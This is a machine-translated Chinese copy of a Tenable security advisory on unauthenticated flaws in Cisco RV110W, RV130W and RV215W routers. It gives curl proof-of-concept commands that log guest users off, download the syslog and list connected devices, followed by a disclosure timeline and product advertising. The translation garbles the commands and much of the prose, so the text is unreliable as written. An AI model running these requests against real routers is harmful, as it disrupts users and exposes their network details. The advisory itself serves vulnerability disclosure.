脸谱网 Google + 推特 LinkedIn YouTube RSS 菜单 搜索 资源——博客 资源-网络研讨会 资源-报告 资源-事件 icons_066 icons_067 icons_068 icons_069 icons_070

思科RV110W、RV130W RV215W路由器多个漏洞

媒介

剧情简介

cve - 2019 - 1897:客人网络拒绝服务

guest_logout.cgi上没有身份验证。一个未经身份验证的远程攻击者可以利用这个踢从客人网络用户。为了实现这个受害者的mac和ip地址需要知道(见下面的cve - 2019 - 1899)。一个概念证明如下:

旋度vv - d”submit_button = status_guestnet.asp&change_action = &submit_type = &gui_action = cip = 10.0.1.100&cmac = 10:08: B1: A0:82:29a”- h“内容类型:应用程序/ x-www-form-urlencoded”- x发布http://10.0.0.1/guest_logout.cgi

cve - 2019 - 1898:未经身份验证的访问通过HTTP Syslog

攻击者可以下载设备的syslog只是通过执行下面的命令:

curl http://10.0.0.1/_syslog.txt

syslog,通常只访问管理员的身份验证之后,包含有用的信息关于功能被启用,DHCP日志,PPTP日志,登录尝试、成功等。攻击者可以学习什么类型的设备连接到路由器,当。一些修订的例子:

2010-02-27 01:14:30 RV215W daemon.info httpd[477]:无效的用户名或密码x.x.x.x。2016-07-21 21:27:24 RV130W local2。注意pppd [1364]: . x.x.x本地IP地址。x 2016-07-21 21:27:24 RV130W local2。注意pppd [1364]: . x.x.x远程IP地址。x 2016-07-21 21:27:24 RV130W local2。注意pppd [1364]: . x.x.x主DNS地址。x 2016-07-21 21:27:24 RV130W local2。注意pppd[1364]:二级. x.x.x DNS地址。x 2019-03-01 19:09:40 RV110W kern.info LAN2WLAN:添加条目:哈希:32/33,问:6/6,指数:8,sip: . x.x.x。x,下降:. x.x.x。x, smac: xx: xx: xx: xx: xx: xx 2019-03-02 05:00:40 RV215W kern.info wl0.0: IEEE 802.11 STA xx: xx: xx: xx: xx: xx与BSSID xx: xx: xx: xx: xx: xx 2019-03-04 06:48:17 RV215W daemon.info udhcpd[21385]:收到请求从xx: xx: xx: xx: xx: xx 2019-03-04 06:48:17 RV215W daemon.info udhcpd [21385]: x.x.x.x发送ACK

cve - 2019 - 1899: Dislcosure连接设备的信息

一个未经身份验证的远程攻击者可以获得列表的所有设备连接到路由器。一个例子:

curl - d”submit_button = status_guestnet.asp&change_action = &submit_type = &gui_action = cip = 20.0.0.0&cmac = aa: aa: aa: aa: aa: aa”- h“内容类型:应用程序/ x-www-form-urlencoded”——不安全- x发布https://10.0.0.1/guest_logout。cgi | grep datalist | grep新% % % Xferd收到总平均速度时间时间时间总花离开当前Dload上传速度0 0 100 100 109 109 0 946 -:-:- - - - -:-:- - - - -:——:—947旋度:(52)空的回复从服务器100 7076 0 6967 100 109 19038 297 -:-:- - - - -:——:————:——:—19038 var datalist = new Array ();datalist[0] =新的AAA (”、“192.168.50.1”40: B0:76:2A: C2:14 ', ' 1 ', ' 0 ', ' WAN接口);datalist [1] = new AAA (ubuntu,‘10.0.0.102’,‘00:0C: 29:15:4C: FC’,‘0’,‘0’,以太局域网);datalist [2] = new AAA (‘TNS3791L’,‘10.0.0.101’, '交流:87:A3:31:51: CA ', ' 0 ', ' 0 ', '以太局域网');

披露时间表

03/04/2019——通知思科PSIRT。
03/04/2019 -思科分配psirt - 0456252928。
03/06/2019——思科表示他们正在调查。
03/19/2019——站得住脚的要求更新。
04/03/2019——站得住脚的要求更新。
04/03/2019——思科还没有报告。
04/30/2019——站得住脚的要求更新。
05/02/2019——思科表明在下半年可能会出版。
05/14/2019——站得住脚的问思科出版日期安排。
05/16/2019——思科回归测试正在进行。针对5月下旬。
05/29/2019——成立思科要求更新。
05/31/2019——思科要求延长到6月19日。提供了CVE作业和出版的url。
05/31/2019——站得住脚的感谢思科和同意6月19日披露。
05/31/2019——思科承认6月19日协议。

交易报告内的所有信息提供了“是”,没有任何形式的保证,包括适销性的隐含保证和健身为特定目的,并没有保证的完整性、准确性、及时性。个人和组织负责评估任何实际或潜在的安全漏洞的影响。

站得住脚的非常重视产品安全。如果你认为你已经找到一个漏洞在一个我们的产品,我们要求您请与我们共同努力,快速解决它为了保护客户。站得住脚的相信迅速应对这样的报道,与研究人员保持沟通,并提供解决方案。

提交漏洞信息的更多细节,请参阅我们的漏洞报告指南页面。

如果你有问题或修正咨询,请电子邮件(电子邮件保护)

风险信息

成立咨询ID
- 2019 - 29
信贷

雅各布·贝恩斯

CVSSv2基地/时间的分数
5.0/4.4
CVSSv2向量
AV: N /交流:L /非盟:N / C: P / I: N: N
更多关键字
CSCvo65034
CSCvo65037
CSCvo65038
CSCvo65058
CSCvo65061
CSCvo65062
CSCvo65045
CSCvo65048
CSCvo65050
受影响的产品
1.2.2.4 RV110W之前
RV130W 1.0.3.51之前
RV215W 1.3.1.4之前
风险因素
媒介

咨询时间

06/19/2019——最初版本

站得住脚的脆弱性管理

以前Tenable.io


享受完全访问一个现代的、基于云的脆弱性管理平台,使您能够看到并追踪你所有的资产与无与伦比的精度。

你站得住脚的脆弱性管理试验Lumin还包括成立,成立网络应用扫描和站得住脚的云安全。

站得住脚的脆弱性管理

以前Tenable.io

享受完全访问一个现代的、基于云的脆弱性管理平台,使您能够看到并追踪你所有的资产与无与伦比的精度。今天购买你的年度订阅。

65年资产

选择你的订阅选项:

现在购买

尝试成立Nessus专业免费的

免费7天

站得住脚的Nessus是当今市场上最全面的漏洞扫描器。

新成立Nessus专家
现在可用

Nessus专家增添了更多的功能,包括外部攻击表面扫描,和添加域和扫描云基础设施的能力。点击这里尝试Nessus专家。

填写下面的表格继续Nessus Pro的审判。

买站得住脚的Nessus专业

站得住脚的Nessus是当今市场上最全面的漏洞扫描器。站得住脚的Nessus专业将帮助自动化漏洞扫描过程,节省时间在你的合规周期,让你与你的团队。

买一个多年的许可并保存。高级支持访问添加到手机、社区和聊天支持一天24小时,一年365天。

选择您的许可

买一个多年的许可并保存。

添加的支持和培训

Tenable.io

享受完全访问一个现代的、基于云的脆弱性管理平台,使您能够看到并追踪你所有的资产与无与伦比的精度。

你站得住脚的脆弱性管理试验Lumin还包括成立,成立网络应用扫描和站得住脚的云安全。

Tenable.io

享受完全访问一个现代的、基于云的脆弱性管理平台,使您能够看到并追踪你所有的资产与无与伦比的精度。今天购买你的年度订阅。

65年资产

选择你的订阅选项:

现在购买

尝试站得住脚的Web应用程序扫描

以前Tenable.ioWeb Application Scanning

享受完全访问我们的最新的web应用程序扫描提供专为现代应用程序的一部分的一个管理平台。安全扫描整个在线组合漏洞具有高精确度没有重体力工作或中断关键web应用程序。现在报名。

你站得住脚的Web应用程序扫描试验还包括站得住脚的脆弱性管理,成立Lumin站得住脚的云安全。

买站得住脚的Web应用程序扫描

以前Tenable.ioWeb Application Scanning

享受完全访问一个现代的、基于云的脆弱性管理平台,使您能够看到并追踪你所有的资产与无与伦比的精度。今天购买你的年度订阅。

5 fqdn

3578美元

现在购买

尝试成立Lumin

可视化和探索你的风险管理,跟踪风险降低随着时间的推移和基准与站得住脚的Lumin你的同行。

你站得住脚的Lumin审判还包括站得住脚的脆弱性管理,站得住脚的Web应用程序扫描和站得住脚的云安全。

买站得住脚的Lumin

联系销售代表如何站得住脚的Lumin可以帮助你了解你的整个组织和管理网络的风险。

尝试站得住脚的云安全

以前Tenable.cs

享受完全访问检测和修复云基础设施配置错误和查看运行时的漏洞。现在注册你的免费试用。了解更多关于审判过程请点击这里。

你站得住脚的云安全试验还包括站得住脚的脆弱性管理,成立Lumin和站得住脚的Web应用程序扫描。

联系销售代表购买站得住脚的云安全

联系销售代表来了解更多关于站得住脚的云安全,看是多么容易机载云账户和获得可见性都几分钟内云配置错误和漏洞。

尝试成立Nessus专家免费

免费7天

现代修建的攻击表面,Nessus专家使您能够看到更多和保护您的组织从漏洞从云。

已经成立Nessus专业吗?
升级到Nessus专家免费7天。

买站得住脚的Nessus专家

现代修建的攻击表面,Nessus专家使您能够看到更多和保护您的组织从漏洞从云。

选择您的许可

买一个多年的执照和存更多的钱。

添加的支持和培训

尝试Nessus专家免费

免费7天

现代修建的攻击表面,Nessus专家使您能够看到更多和保护您的组织从漏洞从云。

已经有了Nessus专业?
升级到Nessus专家免费7天。

买站得住脚的Nessus专家

现代修建的攻击表面,Nessus专家使您能够看到更多和保护您的组织从漏洞从云。

选择您的许可

买一个多年的执照和存更多的钱。

添加的支持和培训

Baidu
map